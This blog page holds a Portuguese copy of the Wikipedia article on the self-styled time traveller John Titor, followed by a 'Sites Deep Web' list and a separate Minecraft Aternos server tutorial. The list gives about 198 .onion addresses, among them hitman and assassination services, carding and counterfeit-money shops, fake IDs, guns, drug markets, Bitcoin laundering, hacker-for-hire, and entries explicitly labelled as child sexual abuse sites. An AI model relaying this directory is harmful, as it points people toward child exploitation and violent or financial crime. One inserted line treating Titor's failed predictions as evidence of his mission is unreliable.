Pesquisar este blog

terça-feira, 13 de outubro de 2015

John Titor - O viajante do tempo


Origem: Wikipédia, a enciclopédia livre.
John Titor
Personagem de John Titor: A Time Traveler's Tale

Suposta foto de John Titor nos anos 40.
Nascimento 1998
Origem 2036
Actividade(s) Viajante do tempo / Soldado
Criado por John Rick Haber
Primeira aparição 27 de Julho de 1998
Última aparição 24 de Março de 2001
John Titor foi um nome usado em vários fóruns postados entre 2000 e 2001 por um internauta que alegava ser um viajante no tempo do ano de 2036. Nessas postagens, ele fez diversas previsões (algumas vagas, outras bem específicas)1 sobre eventos que aconteceriam num futuro próximo, entre 2004 e 2036. Ele descreveu um cenário de caos e guerra no qual os Estados Unidos foram divididos em cinco regiões menores, o meio ambiente e a infraestrutura foram devastados por um ataque nuclear e várias outras potências mundiais foram destruídas.

Até hoje, a história tem sido recontada em diversas mídias, incluindo um livro publicado em 2003 intitulado John Titor: A Time Traveler's Tale (ISBN 1-59196-436-9), hoje fora da imprensa; uma peça de teatro de 2004, Time Traveler Zero Zero, baseada na história de John Titor e uma franquia japonesa chamada Steins;Gate, original de 2009, que incluía uma visual novel, um mangá e um anime que têm como um dos seus principais temas a história de John Titor. Ele também foi assunto de discussões no programa de rádio Coast to Coast AM.2 Neste aspecto, a história de Titor pode ser considerada única por ter atingido uma considerável repercussão a partir de uma mídia à época limitada: um fórum de discussão.

Índice

1 As postagens de John Titor
1.1 Pontos principais
1.2 Máquina do tempo[6]
1.3 Previsões[8]
2 Análise das afirmações
2.1 Previsões fracassadas
2.2 Problemas com a tecnologia
2.3 Problemas com a história
2.4 Inquérito da história
3 Referências
4 Ligações externas
As postagens de John Titor

Em novembro de 2000, no fórum "Instituto Viagem" o internauta que mais tarde seria conhecido como John Titor começou a postar, sob o pseudônimo TimeTravel_0, mensagens que discutiam sobre viagem no tempo em geral (no início sem previsões ou referências a possíveis eventos futuros). Ele foi o primeiro a descrever "em seis partes" uma máquina do tempo, informando do que ela precisaria para funcionar (ver abaixo). Ele também respondia a perguntas de outros usuários do fórum sobre como tal máquina funcionaria.

Pouco tempo depois, TimeTravel_0 alegou ser um viajante no tempo do futuro e começou a postar descrições variadas sobre como era seu tempo. Gradualmente, ele começou a revelar uma imagem mais complexa do futuro. Embora muitas de suas postagens dissessem respeito à condição do mundo no futuro, Titor também respondeu a perguntas tanto no fórum quanto no IRC, 3 . Ele também falava de eventos mais atuais; por exemplo, em uma postagem ele disse que "A importante descoberta que permitirá a tecnologia de viagem no tempo acontecerá perto do ano de [2001] quando o CERN ativar sua maior instalação". 4 .

O nome "John" não foi apresentado até janeiro de 2001, quando TimeTravel_0 começou a postar no fórum "BBS Art Bell" (que requeria um nome ou pseudônimo para cada conta). Ele enviou suas últimas mensagem em março de 2001. Com o passar do tempo, alguns dos tópicos acabaram corrompidos; mas as postagens de Titor tinham sido salvas nos discos rígidos dos outros participantes e foram copiadas para Anomalies.net, junto com novas discussões sobre a ciência por trás da viagem no tempo de Titor assim como sobre suas previsões. Por volta de 2003, vários sites reproduziram as postagens de Titor, rearrumando-as em narrativas. Nem todos se referem às datas originais de postagem.5

Pontos principais


IBM 5100 Razão pela qual John Titor fez a sua viagem temporal.
Em suas postagens online, Titor alegou ser um soldado americano do ano de 2036 originário da cidade de Tampa, na Flórida. Ele teria sido designado para um projeto governamental de viagem no tempo. Supostamente, Titor foi enviado de volta a 1975 para recobrar um computador IBM 5100 que ele dizia ser necessário para depurar diversos programas antigos de computador em 2036 (uma possível referência ao problema do ano 2038 nos sistemas Unix). O 5100 executa as linguagens de programação APL e BASIC. Titor foi selecionado para essa missão especificamente, dado que seu avô paterno esteve diretamente envolvido na montagem e programação do 5100.

Titor alegou estar em uma escala no ano 2000 por "razões pessoais" e(ou) para coletar fotografias perdidas na (futura) guerra civil e para visitar sua família, de que ele falava com frequência. Titor também disse que esteve, por alguns meses, tentando alertar qualquer um que escutasse sobre a ameaça da propagação da doença de Creutzfeldt-Jakob através de produtos com carne de vaca e sobre a possibilidade da guerra civil dentro dos Estados Unidos. Quando questionado sobre esses assuntos por um participante online, Titor também expressou um interesse em mistérios sem explicação como extraterrestres (assunto que, mesmo em seu tempo, continuaria misterioso). Titor sugeriu que OVNIs e visitantes alienígenas podem também ser viajantes no tempo de um futuro muito mais longe que o seu, que possuem máquinas do tempo superiores às suas.

Máquina do tempo6

Numa de suas primeiras postagens, ele descreveu a máquina do tempo como "unidade de deslocamento no tempo de massa estacionária alimentada por duas singularidades duplamente positivas girando no topo", produzindo uma "senoide Tipler deslocada padrão". Sua primeira postagem foi mais explícita, dizendo que a máquina continha:

Duas unidades de armazenamento magnético para as microssingularidades duplas.
Uma variedade de injeção eletrônica para alterar as microssingularidades de massa e gravidade.
Um sistema de ventilação de raios X e congelamento.
Sensores de gravidade ou uma comporta variável de gravidade.
Quatro principais relógios de césio.
Três principais unidades computacionais.
De acordo com as postagens, o dispositivo foi instalado na parte traseira de um Chevrolet Corvette conversível de 1967 e mais tarde movido para um caminhão de 1987 que possuía tração nas quatro rodas.

Titor, além disso, afirmou que o "modelo Everett-Wheeler da física quântica" estava certo. Esse modelo, mais conhecido como a interpretação de muitos mundos, postula que todo resultado possível de uma decisão quântica na verdade ocorre em um "universo" separado. Titor afirmou que esse é motivo pelo qual o paradoxo do avô não ocorreria; de acordo com a lógica do argumento, Titor estaria matando uma pessoa diferente de seu avô numa linha do tempo distinta da dele.

"...O paradoxo do avô é impossível. De fato, todo paradoxo (temporal) é impossível. A teoria de Everett-Wheeler-Graham ou dos múltiplos mundos está correta. Todos os possíveis estados quânticos, eventos, possibilidades e resultados são reais, eventuais, e estão ocorrendo. As chances de todas as coisas acontecerem em algum lugar, durante algum tempo no superverso é de 100%."7

Previsões8

Uma das primeiras previsões de Titor foi de uma guerra civil nos Estados Unidos que estaria relacionada com "ordem e direitos".9 Ele afirmou que essa guerra começaria em 2004,10 com desordens civis envolvendo as eleições presidenciais daquele ano. Esse conflito civil, que segundo ele teria "um evento semelhante ao cerco de Waco todo mês e pioraria mais e mais",10 chegaria "praticamente às portas de todos"9 e atingiria seu ápice em 2008.

Titor afirmou que quando ele tinha 13 anos de idade, em 2011, ele lutou com a "Fighting Diamondbacks", uma unidade de infantaria de espingarda da Flórida, por pelo menos quatro anos. Entretanto, em outras postagens ele postulou que se escondeu durante a guerra. Como um resultado da guerra, os Estados Unidos se dividiram em cinco regiões, com base em vários fatores e diferentes objetivos militares. A guerra civil, de acordo com Titor, terminaria então em 2015 com uma breve, porém intensa, Terceira Guerra Mundial:

"Em 2015, a Rússia lança um ataque nuclear contra as maiores cidades dos Estados Unidos (que são o "outro lado" da guerra civil de acordo com a minha perspectiva), da China e da Europa. Os Estados Unidos contra-atacam. As cidades americanas são destruídas junto com o AFE (American Federal Empire, Império Federal Americano). Então nós (no interior) vencemos. A União Europeia e a China foram também destruídas."11

Titor se refere à troca como o "Dia N". Washington, D.C. e Jacksonville, Flórida são especificamente mencionadas como cidades atingidas. Após a guerra, Omaha, Nebraska é a nova capital da nação.

Titor é vago quanto às motivações e causas exatas da Terceira Guerra Mundial. Numa de suas observações, ele caracterizou as hostilidades como decorrentes dos "choques de fronteira e superpopulação"12 mas fala também do presente conflito entre árabes e judeus como um prenúncio da Terceira Guerra Mundial.

Análise das afirmações

Previsões fracassadas

Uma das primeiras declarações de Titor foi a de que a CERN descobriria a base para a viagem no tempo perto de 2001, com a criação dos "buracos negros" em miniatura cerca de seis meses após sua partida. Nada semelhante a isso foi noticiado em tempo algum. Um artigo que seria publicado por volta do tempo em que ele previu a criação dos buracos negros em miniatura pela CERN (um tema recorrente, também atribuído a Fermilab e Brookhaven em várias épocas)13 foi tomado por alguns como uma evidência para sua afirmação, mas esses eventos também não ocorreram. Nenhuma guerra civil não esteve nem remotamente perto de eclodir após as eleições americanas de 2004, sem nenhum conflito adicional em 2008 da maneira que Titor descreveu.

Um exemplo particularmente óbvio envolve os Jogos Olímpicos, sobre os quais Titor afirmou: "Como um resultado de muitos conflitos, não, não houve Jogos Olímpicos oficiais depois de 2004."14 A realização normal dos Jogos Olímpicos de Inverno de 2006,15 dos Jogos Olímpicos de Verão de 2008, dos Jogos Olímpicos de Inverno de 2010 e dos Jogos Olímpicos de Verão de 2012 e assim por diante refuta claramente esse argumento.

O que também pode vir a ser uma prova de que Titor realmente tinha uma missão, e conseguiu cumpri-las evitando catástrofes.

Problemas com a tecnologia

No contexto da imagem de demonstração provida por John Titor, o fato do feixe do apontador laser estar fazendo uma curva revela uma inconsistência óbvia, pois objetos perto do feixe não estão curvados também. O enquadramento da janela visível do fundo, por exemplo, deveria aparecer distorcido em proximidade a um grande gradiente de gravidade, mas não aparece. Alguns especularam que o "feixe" é na verdade uma fibra ótica.16

Titor afirmou que ele foi enviado para o passado para adquirir um computador IBM 5100, pois este poderia traduzir diversos tipos de códigos em seu tempo. De acordo com o engenheiro da IBM Bob Dubke, as declarações de Titor a respeito da habilidade pouco conhecida do IBM 5100 de emular e depurar sistemas de estrutura principais estavam corretas.17 Defensores dizem que essa informação não era publicamente disponível em 2000 ou 2001 quando Titor fez sua declaração,18 o próprio Titor afirmou que esse recurso foi "descoberto" não antes de 2036, quando o Unix, como a fonte subjacente por trás de todos os sistemas operacionais de computador que continuam executando infraestruturas locais e outras tarefas computacionais, estava a apenas dois anos de não ser capaz de funcionar mais devido às limitações de números inteiros de 32 bits.19

Entretanto, essa capacidade de emulação era amplamente conhecida na indústria e foi comentada em várias publicações que lidavam tanto com o IBM 5100 como com os microcódigos programáveis em geral.20 Referências a este fato estiveram também disponíveis na Internet antes de 1999 e portanto precederam as postagens de Titor. Isso é um pedaço bastante obscuro de trívia, mas que sugere que quem quer que estivesse postando conhecia bem a máquina ou então tinha pelo menos um interesse geral em computadores antigos.21

Problemas com a história

Numerosos comentários apontaram amplas similaridades entre a história de Titor e o romance pós-apocalíptico de ficção científica Alas, Babylon de Pat Frank.22 Alas, Babylon se passa numa pequena cidade na Flórida um pouco antes e depois de uma guerra nuclear e descreve a luta pela sobrevivência de uma família após essa guerra. No livro, o protagonista vive na cidade mítica de "Fort Repose" (Repouso do Forte) , enquanto Titor afirmou que vive no "Forte", antes conhecido como Universidade da Flórida (UF). Uma análise dessas declarações também sugere diversas inconsistências dentro da história. Por exemplo, em algumas postagens Titor postula que o dinheiro é bastante usado e que as pessoas ainda têm cartões de crédito, apesar de sua outra afirmação de que o banco centralizado não mais existe (pensamento que provavelmente não excluiria a possibilidade da moeda particular estar sendo usada). Em outra publicação ele especulou que o atual dólar americano seria utilizável no seu tempo, mas isso só ocorreria após a reorganização do governo federal de acordo com a sua própria história, possivelmente fazendo com que a moeda seja menos valiosa.23 Na maioria dos casos, ele afirma que teve sua educação básica na Universidade da Flórida, mas em outras postagens ele diz que foi escolarizado em casa.24

Outros problemas com a história incluem inconsistências relativas aos comentários de Titor. Sua primeira aparição parece ter ocorrido não em 2000, mas no verão boreal de 1998 através de duas mensagens de fax para um programa da rádio Art Bell, Coast to Coast AM. Quando ele começou a postar sua história online, o bug do milênio Y2K (1-1-2000) aconteceu, porém não trouxe quaisquer problemas. Ainda nas mensagens de 1998 para a rádio Art Bell ele disse, "Y2K é um desastre. Muitas pessoas congelam até a morte tentando ir a climas mais quentes. O governo tenta manter o poder instituindo a lei marshall [sic]..." 25

Na história online ele afirmou que uma parte de sua missão era prevenir a futura guerra mundial mudando a história. Ainda em outubro de 2000, um mês antes de ele começar a postar, ele apareceu numa sala de bate-papo IRC do Reino Unido. No chat, sua resposta à questão de Yareisa sobre ser possível ele mudar o futuro que ele estava prevendo foi a seguinte: "Já é tarde demais. Eu só desejo que as coisas não tenham que ocorrer da mesma maneira que elas ocorreram." 26

Inquérito da história

O programa de TV italiano Voyager - Ai confini della conoscenza transmitiu uma investigação da história de John Titor em 19 de maio de 2008.27 Mike Lynch, o detetive privado contratado para tal investigação, supôs que não existem traços de registros, nem no passado distante, de qualquer John Titor ou família Titor. Além disso, a John Titor Foundation não tinha escritório e seu endereço é uma caixa de correio alugada; sem fitas, gravações, ou evidência de algum Titor; e somente Larry Haber, um advogado e dono dos direitos comerciais que envolvem John Titor, confirmou sua existência. A conclusão de Lynch é de que John Titor pode ser John Rick Haber, um expert em computadores que é ou foi irmão de Larry Haber. Se tudo isso, no entanto, for verdade, John Titor é atualmente um adolescente com entre 16 e 18 anos, calculando-se a idade dele em sua citação de que em 2011 tinha 13 anos e lutou contra uma divisão de infantaria, supõe-se que ele tenha nascido entre 1997 e 1998, apesar desse evento citado nunca ter acontecido.

Sites Deep Web

  1. http://3g2upl4pq6kufc4m.onion/ – DuckDuckGo Search Engine
  2. http://xmh57jrzrnw6insl.onion/ – TORCH – Tor Search Engine
  3. http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page – Uncensored Hidden Wiki
  4. http://32rfckwuorlf4dlv.onion/ – Onion URL Repository
  5. http://e266al32vpuorbyg.onion/bookmarks.php – Dark Nexus
  6. http://5plvrsgydwy2sgce.onion/ – Seeks Search
  7. http://2vlqpcqpjlhmd5r2.onion/ – Gateway to Freenet
  8. http://nlmymchrmnlmbnii.onion/ – Is It Up?
  9. http://kpynyvym6xqi7wz2.onion/links.html – ParaZite
  10. http://wiki5kauuihowqi5.onion/ – Onion Wiki
  11. http://torwikignoueupfm.onion/index.php?title=Main_Page– Tor Wiki
  12. http://kpvz7ki2v5agwt35.onion – The Hidden Wiki
  13. http://idnxcnkne4qt76tg.onion/ – Tor Project: Anonymity Online
  14. http://torlinkbgs6aabns.onion/ – TorLinks
  15. http://jh32yv5zgayyyts3.onion/ – Hidden Wiki .Onion Urls
  16. http://wikitjerrta4qgz4.onion/ – Hidden Wiki – Tor Wiki
  17. http://xdagknwjc7aaytzh.onion/ – Anonet Webproxy
  18. http://3fyb44wdhnd2ghhl.onion/wiki/index.php?title=Main_Page – All You’re Wiki – clone of the clean hidden wiki that went down with freedom hosting
  19. http://3fyb44wdhnd2ghhl.onion/ – All You’re Base
  20. http://j6im4v42ur6dpic3.onion/ – TorProject Archive
  21. http://p3igkncehackjtib.onion/ – TorProject Media
  22. http://kbhpodhnfxl3clb4.onion – Tor Search
  23. http://cipollatnumrrahd.onion/ – Cipolla 2.0 (Italian)
  24. http://dppmfxaacucguzpc.onion/ – TorDir – One of the oldest link lists on Tor
  25. http://torbrokerge7zxgq.onion/ – TorBroker – Trade securities anonymously with bitcoin, currently supports nearly 1000 stocks and ETFs
  26. http://fogcore5n3ov3tui.onion/ – Bitcoin Fog – Bitcoin Laundry
  27. http://2vx63nyktk4kxbxb.onion/ – AUTOMATED PAYPAL AND CREDIT CARD STORE
  28. http://samsgdtwz6hvjyu4.onion – Safe, Anonymous, Fast, Easy escrow service.
  29. http://easycoinsayj7p5l.onion/ – EasyCoin – Bitcoin Wallet with free Bitcoin Mixer
  30. http://jzn5w5pac26sqef4.onion/ – WeBuyBitcoins – Sell your Bitcoins for Cash (USD), ACH, WU/MG, LR, PayPal and more
  31. http://ow24et3tetp6tvmk.onion/ – OnionWallet – Anonymous Bitcoin Wallet and Bitcoin Laundry
  32. http://qc7ilonwpv77qibm.onion/ – Western Union Exploit
  33. http://3dbr5t4pygahedms.onion/ – ccPal Store
  34. http://y3fpieiezy2sin4a.onion/ – HQER – High Quality Euro Replicas
  35. http://qkj4drtgvpm7eecl.onion/ – Counterfeit USD
  36. http://nr6juudpp4as4gjg.onion/pptobtc.html – PayPal to BitCoins
  37. http://nr6juudpp4as4gjg.onion/doublecoins.html – Double Your BitCoins
  38. http://lw4ipk5choakk5ze.onion/raw/4588/ – High Quality Tutorials
  39. http://6w6vcynl6dumn67c.onion/ – Tor Market Board – Anonymous Marketplace Forums
  40. http://wvk32thojln4gpp4.onion/ – Project Evil
  41. http://5mvm7cg6bgklfjtp.onion/ – Discounted electronics goods
  42. http://lw4ipk5choakk5ze.onion/raw/evbLewgkDSVkifzv8zAo/ – Unfriendlysolution – Legit hitman service
  43. http://nr6juudpp4as4gjg.onion/torgirls.html – Tor Girls
  44. http://tuu66yxvrnn3of7l.onion/ – UK Guns and Ammo
  45. http://nr6juudpp4as4gjg.onion/torguns.htm – Used Tor Guns
  46. http://ucx7bkbi2dtia36r.onion/ – Amazon Business
  47. http://nr6juudpp4as4gjg.onion/tor.html – Tor Technology
  48. http://hbetshipq5yhhrsd.onion/ – Hidden BetCoin
  49. http://cstoreav7i44h2lr.onion/ – CStore Carded Store
  50. http://tfwdi3izigxllure.onion/ – Apples 4 Bitcoin
  51. http://e2qizoerj4d6ldif.onion/ – Carded Store
  52. http://jvrnuue4bvbftiby.onion/ – Data-Bay
  53. http://bgkitnugq5ef2cpi.onion/ – Hackintosh
  54. http://vlp4uw5ui22ljlg7.onion/ – EuroArms
  55. http://b4vqxw2j36wf2bqa.onion/ – Advantage Products
  56. http://ybp4oezfhk24hxmb.onion/ – Hitman Network
  57. http://mts7hqqqeogujc5e.onion/ – Marianic Technology Services
  58. http://mobil7rab6nuf7vx.onion/ – Mobile Store
  59. http://54flq67kqr5wvjqf.onion/ – MSR Shop
  60. http://yth5q7zdmqlycbcz.onion/ – Old Man Fixer’s Fixing Services
  61. http://matrixtxri745dfw.onion/neo/uploads/MATRIXtxri745dfwONION_130827231336IPA_pc.png – PC Shop
  62. http://storegsq3o5mfxiz.onion/ – Samsung StorE
  63. http://sheep5u64fi457aw.onion/ – Sheep Marketplace
  64. http://nr6juudpp4as4gjg.onion/betcoin.htm – Tor BetCoin
  65. http://qizriixqwmeq4p5b.onion/ – Tor Web Developer
  66. http://vfqnd6mieccqyiit.onion/ – UK Passports
  67. http://en35tuzqmn4lofbk.onion/ – US Fake ID Store
  68. http://xfnwyig7olypdq5r.onion/ – USA Citizenship
  69. http://uybu3melulmoljnd.onion/ – iLike Help Guy
  70. http://dbmv53j45pcv534x.onion/ – Network Consulting and Software Development
  71. http://lw4ipk5choakk5ze.onion/raw/4585/ – Quick Solution (Hitman)
  72. http://nr6juudpp4as4gjg.onion/tynermsr.htm – Tyner MSR Store
  73. http://rso4hutlefirefqp.onion/ – EuCanna – Medical Grade Cannabis Buds, Rick Simpson Oil, Ointments and Creams
  74. http://newpdsuslmzqazvr.onion/ – Peoples Drug Store – The Darkweb’s Best Online Drug Supplier!
  75. http://smoker32pk4qt3mx.onion/ – Smokeables – Finest Organic Cannabis shipped from the USA
  76. http://fzqnrlcvhkgbdwx5.onion/ – CannabisUK – UK Wholesale Cannabis Supplier
  77. http://kbvbh4kdddiha2ht.onion/ – DeDope – German Weed and Hash shop. (Bitcoin)
  78. http://s5q54hfww56ov2xc.onion/ – BitPharma – EU vendor for cocaine, speed, mdma, psychedelics and subscriptions
  79. http://ll6lardicrvrljvq.onion/ – Brainmagic – Best psychedelics on the darknet
  80. http://25ffhnaechrbzwf3.onion/ – NLGrowers – Coffee Shop grade Cannabis from the netherlands
  81. http://fec33nz6mhzd54zj.onion/index.php – Black Market Reloaded Forums
  82. http://atlmlxbk2mbupwgr.onion/ – Atlantis Marketplace Forums
  83. http://atlantisrky4es5q.onion/ – Atlantis Marketplace
  84. http://dkn255hz262ypmii.onion/ – Silk Road Forums
  85. http://4yjes6zfucnh7vcj.onion/ – Drug Market
  86. http://k4btcoezc5tlxyaf.onion/ – Kamagra for BitCoins
  87. http://silkroadvb5piz3r.onion/silkroad/home – Silk Road Marketplace
  88. http://5onwnspjvuk7cwvk.onion/ – Black Market Reloaded
  89. http://matrixtxri745dfw.onion/ – Image Uploader
  90. http://lw4ipk5choakk5ze.onion/ – PasteThis – Tor based Pastebin
  91. http://wzrtr6gpencksu3d.onion:8080/ – Gittor
  92. http://nr6juudpp4as4gjg.onion/ – Free hosting
  93. http://tklxxs3rdzdjppnl.onion/ – Liberty’s Hackers Hosting Service
  94. http://matrixtxri745dfw.onion/ – Matrix Trilogy
  95. http://74ypjqjwf6oejmax.onion/ – Beneath VT – Exploring Virginia Tech’s Steam Tunnels and Beyond
  96. http://76qugh5bey5gum7l.onion/ – Deep Web Radio
  97. http://edramalpl7oq5npk.onion/Main_Page – Encyclopedia Dramatica
  98. http://ih4pgsz3aepacbwl.onion/ – Hushbox
  99. http://ad52wtwp2goynr3a.onion/# – Dark Like My Soul
  100. http://tns7i5gucaaussz4.onion/ – FreeFor
  101. http://gdkez5whqhpthb4d.onion/ – Scientology Archive
  102. http://newsiiwanaduqpre.onion/ – All the latest news for tor
  103. http://5vppavyzjkfs45r4.onion/ – Michael Blizek
  104. http://7ueo7ahq2xlpwx7q.onion/ – AYPSELA News
  105. http://7hk64iz2vn2ewi7h.onion/ – Blog about Stories
  106. http://tigas3l7uusztiqu.onion/ – Mike Tigas
  107. http://mpf3i4k43xc2usxj.onion/ – Sam Whited
  108. http://7w2rtz7rgfwj5zuv.onion/ – An Open Letter to Revolutionaries
  109. http://3c3bdbvhb7j6yab2.onion/ – Totse 2
  110. http://4fvfamdpoulu2nms.onion/ – Lucky Eddie’s Home
  111. http://nwycvryrozllb42g.onion/searchlores/index.htm – Fravia’s Web Searching Lore
  112. http://newsiiwanaduqpre.onion/ – OnionNews – Blog about the onionland
  113. http://2gxxzwnj52jutais.onion/phpbb/index.php – Onion Forum 2.0 renewed
  114. http://3fyb44wdhnd2ghhl.onion/ib/ – Onii-Chan
  115. http://bx7zrcsebkma7ids.onion – Jisko
  116. http://npdaaf3s3f2xrmlo.onion/ – Twitter clone
  117. http://jv7aqstbyhd5hqki.onion – HackBB – Hacking & cracking forum
  118. http://xdagknwjc7aaytzh.onion/20/http/1.4.7.9/forummain.htm – Read only access to the Freenet FMS forums via the Anonet Webproxy
  119. http://sbforumaz7v3v6my.onion/ – SciBay Forums
  120. http://kpmp444tubeirwan.onion/ – DeepWeb
  121. http://r5c2ch4h5rogigqi.onion/ – StaTorsNet
  122. http://hbjw7wjeoltskhol.onion – The BEST tor social network! File sharing, messaging and much more. Use a fake email to register.
  123. http://t4is3dhdc2jd4yhw.onion/ – OnionForum 3.0 – New Onionforum for general talk, now with marketplace
  124. http://zw3crggtadila2sg.onion/imageboard/ – TorChan – One of the oldest chans on Tor
  125. http://bitmailendavkbec.onion – swiss email
  126. http://365u4txyqfy72nul.onion/ – Anonymous E-mail sevice. You can only communicate with other users currently using this service. So tell all your friends about it!
  127. http://sms4tor3vcr2geip.onion/ – SMS4TOR – Self destructing messages
  128. http://notestjxctkwbk6z.onion/ – NoteBin – Create encrypted self-destructing notes
  129. http://torbox3uiot6wchz.onion/ – [TorBox] The Tor Mail Box
  130. http://u6lyst27lmelm6oy.onion/index.php – Blue matrix chat NOT UP ALL THE TIME so chek often to see when it is
  131. http://wi7qkxyrdpu5cmvr.onion/ – Autistici/Inventati
  132. http://u4uoz3aphqbdc754.onion/ – Hell Online
  133. http://6sgjmi53igmg7fm7.onion/index.php?title=Main_Page – Bugged Planet
  134. http://faerieuaahqvzgby.onion/ – Fairie Underground
  135. http://2r2tz6wzqh7gaji7.onion/ – Kavkaz Center
  136. http://tnysbtbxsf356hiy.onion/ – The New Yorker Strongbox
  137. http://duskgytldkxiuqc6.onion/ – Example rendezvous points page
  138. http://rrcc5uuudhh4oz3c.onion/ – The Intel Exchange Forum :: Information and discussion on various topics, ranging from Illegal Activities and Alternative Energy, to Conspiracy Theories and Hacking. Same people from SnapBBS on a fully secure, moderated and categorized forum.
  139. http://opnju4nyz7wbypme.onion/weblog/index.html – A7B blog :: a blog dedicated to the restoration of a limited constitutional republic in the USA
  140. http://assmkedzgorodn7o.onion/ – Anonymous, safe, secure, crowdfunded assassinations.
  141. http://duskgytldkxiuqc6.onion/comsense.html – Commo Sense by Thomas Paine
  142. http://nwycvryrozllb42g.onion/ – Destination Unknown
  143. http://zbnnr7qzaxlk5tms.onion/ – Wiki Leaks
  144. http://salted7fpnlaguiq.onion/ – SALT
  145. http://yj5rbziqttulgidy.onion/ – Itanimulli
  146. http://bbxdfsru7lmmbj32.onion/marketplace/ – Delta Initiative
  147. http://2ogmrlfzdthnwkez.onion/ – Rent-A-Hacker
  148. WAREZ
  149. http://2gxxzwnj52jutais.onion/ – The Nowhere Server (restored from backup after FH)
  150. http://jntlesnev5o7zysa.onion/ – The Pirate Bay – Torrents
  151. http://am4wuhz3zifexz5u.onion/ – Tor Library – library of books and other media files
  152. http://uj3wazyk5u4hnvtk.onion/ – The Pirate Bay – Torrents (official .onion)
  153. http://doxbindtelxceher.onion/ – DOXBIN
  154. http://wuvdsbmbwyjzsgei.onion/ – Music Downloads
  155. http://lolicore75rq3tm5.onion/ – Lolicore and Speedcore Music
  156. http://xfmro77i3lixucja.onion/ – ebooks
  157. http://vt27twhtksyvjrky.onion/ – lol 20th Century Western Music Recordings and Scores
  158. http://2ygbaoezjdmacnro.onion/ – Pony at Noisebridge
  159. http://xfmro77i3lixucja.onion/ – Imperial Library of Trantor
  160. http://c3jemx2ube5v5zpg.onion/ – Jotunbane’s Reading
  161. http://tklxxs3rdzdjppnl.onion/sharepass/ – SharePass – Password sharing community
  162. http://k4jmdeccpnsfe43c.onion/ – Girls Released – Some nice model pics
  163. http://54dgeda4ik6iypui.onion/ – Gallery – Met-Art, FTVX etc sets
  164. http://pinkmethuylnenlz.onion/ – The Pink Meth (mirror)
  165. http://2fqgjzbb2h7yevom.onion/klixen/ – Klixen
  166. http://orsxvca7glswueo7.onion/ – EroDir – Lots and lots of Hentai
  167. http://mmgh3rqeswrlgzdr.onion/ – VOR-COM
  168. EROTIC HARD CANDY
  169. http://lovezspamopfiqul.onion/ – TLZ discussion board
  170. http://tqjhyhbso4mdcrvh.onion/sciclaycams/ – Sciclay Cams
  171. http://iqlnc7cbykhhurfo.onion/ – LLL – Image and Video down- & upload
  172. http://oglbv4c4kpoobkid.onion/oglb/ – Onion Girl Love Board – Private Board
  173. http://bvunqhdbizqxyuoe.onion/ – Boy Vids 4.0
  174. http://girlbmayme6evpwv.onion/ – Girls and Boys
  175. http://7haz75ietrhjds3j.onion/ – All Natural Spanking
  176. http://spofoh4ucwlc7zr6.onion/ – Safe Port Forum
  177. http://tqjhyhbso4mdcrvh.onion/forum/ – BL Forum
  178. http://ftwwebt6e3nb3lmw.onion/ – FTW Image Boards
  179. http://tlz3gig7k46s4r66.onion/ – TLZ private forums
  180. http://vkq6wz4ozmldscii.onion/ – Topic Links – A CP sites link list
  181. http://66m4z7ygkqghb4tc.onion/ – Some paradisebirds casey videos
  182. http://germanyhusicaysx.onion – Deutschland im Deep Web – German forum
  183. http://ffi5v46ttwgx3fby.onion/ – Das ist Deutschland hier 2.0 – German Board
  184. http://paisleli66axejos.onion/ – PAIS
  185. http://runionv62ul3roit.onion/ – Russian Onion Union
  186. http://s6cco2jylmxqcdeh.onion/ – ?ltimos bumps
  187. http://5xki35vc4g5ts6gc.onion – GTF Greek Tor Forum . For greek speaking users
  188. http://cipollatnumrrahd.onion/index.php – Cipolla 2.0 – Italian Community
  189. http://runionv62ul3roit.onion – Russian community: market and anonymous talks about security, guns etc.
  190. http://ptrackcp2noqu5fh.onion/ – PoliceTrack – Ne vous faites plus suivre par la police.
  191. http://amberoadychffmyw.onion – Amberoad – russian anonymous market
  192. http://r2d2akbw3jpt4zbf.onion – R2D2 – russian anonymous market
  193. http://ramp2bombkadwvgz.onion – RAMP – biggest russian market (drugs only)
  194. http://szmyt4v4vjbnxpg3.onion/ – Славянский
  195. http://o2tu5zjxjlibrary.onion/ – Bibliotheca Alexandrina
  196. http://xzzpowtjlobho6kd.onion/wordpress/ – DeepBlog
  197. http://zqiirytam276uogb.onion/ – Thorlauta
  198. http://ocbh4hoqs37unvv6.onion – French Deep Web

segunda-feira, 12 de outubro de 2015

Criando server de minecraft sem Hamachi no Aternos


Sofrendo com o lag quando joga com amigos? Criou um server LAN e ninguém consegue entrar? Não seria bom ter um host só pra você? O Aternos é um serviço gratuito no qual os jogadores podem hospedar servidores com até 10 slots gratuitamente para jogar com os amigos. Quer criar um servidor lá e não sabe como? Acompanhe o nosso tutorial e crie os eu server também, em poucos cliques!


Parte I - Criando uma conta

O primeiro passo para criar seu servidor é, antes, criar uma conta no site da Aternos. Para isso, entre no site deles, procure o botão Convidado, clique na setinha e selecione a opção Registrar-se.
Uma tela de cadastro irá aparecer. Preencha o formulário que irá aparecer informando seu email, seu username e a sua senha. Após ter feito isso, clique em Registrar-se e aguarde.
Feito isso, é hora de você ir até o seu email e procurar a mensagem do Aternos para confirmar a sua conta. Após fazer a confirmação, faça login normalmente.

Parte II - Criando seu servidor

Após logar na sua conta, vá ao mesmo lugar onde você havia clicado pra se registrar. Agora, clique na setinha novamente e selecione a opção "Criar Servidor".
Uma página chamada "Meu Servidor" vai aparecer. Essa página é dividida em várias partes. Vamos tentar entender pra que cada uma serve.

Na primeira parte, você pode conferir as configurações gerais do servidor. Se ele está On ou Off, a sua versão e também o IP. Também temos vários botões de ação, onde você pode ligar e desligar o server, criar um novo mundo ou usar algum mapa personalizado, fazer download do mundo atual, etc.
A segunda parte são as opções do servidor. Aqui, você pode decidir quantos slots o server terá (o máximo é 10), se haverá Whitelist (isso é, se o servidor só será aberto pra usuários que estiverem na lista), se será pra originais ou piratas (se você quiser que seja só para originais, selecione premium, e para originais e piratas, selecione cracked). a mensagem da descrição personalizada, gamemode, PVP, blocos de comando, etc...

Supondo que eu queira fazer um server pra 10 pessoas, originais e piratas, no criativo e com command blocks ativados, eu usaria uma configuração como essa: 
A terceira parte é onde você escolherá em que versão do Minecraft o server irá rodar. Essa é uma das partes mais legais, pois você pode colocar mods e plugins no servidor também. Infelizmente, você só pode usar os mods e plugiins que o site já oferece.
Na última parte você pode colocar os nicks da Whitelist e colocar os nicks dos OPs do server. Lembre-se de colocar seu nick como OP, senão quando você entrar ficará como um player normal e não terá acesso aos comandos de OP.
